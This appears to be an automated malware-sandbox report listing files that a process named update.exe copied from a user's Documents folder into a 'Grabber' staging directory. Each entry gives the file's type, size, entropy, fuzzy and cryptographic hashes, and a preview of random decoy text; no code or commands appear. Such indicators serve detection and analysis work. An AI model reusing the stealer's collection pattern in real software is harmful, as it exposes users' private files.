                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA\EFOYFBOLXA.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
                                                  Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA\GIGIYTFFYT.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.7020597455120665
                                                  Encrypted:false
                                                  SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                  MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                  SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                  SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                  SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                  Malicious:false
                                                  Preview:GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA\JDDHMPCDUJ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.687055908915499
                                                  Encrypted:false
                                                  SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                  MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                  SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                  SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                  SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                  Malicious:false
                                                  Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA\PALRGUCVEH.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA\ZGGKNSUKOP.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6959554225029665
                                                  Encrypted:false
                                                  SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                  MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                  SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                  SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                  SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                  Malicious:false
                                                  Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EIVQSAOTAQ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692024230831571
                                                  Encrypted:false
                                                  SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                  MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                  SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                  SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                  SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                  Malicious:false
                                                  Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\EOWRVPQCCS.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692990330209164
                                                  Encrypted:false
                                                  SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                  MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                  SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                  SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                  SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                  Malicious:false
                                                  Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\GIGIYTFFYT.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.7020597455120665
                                                  Encrypted:false
                                                  SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                  MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                  SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                  SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
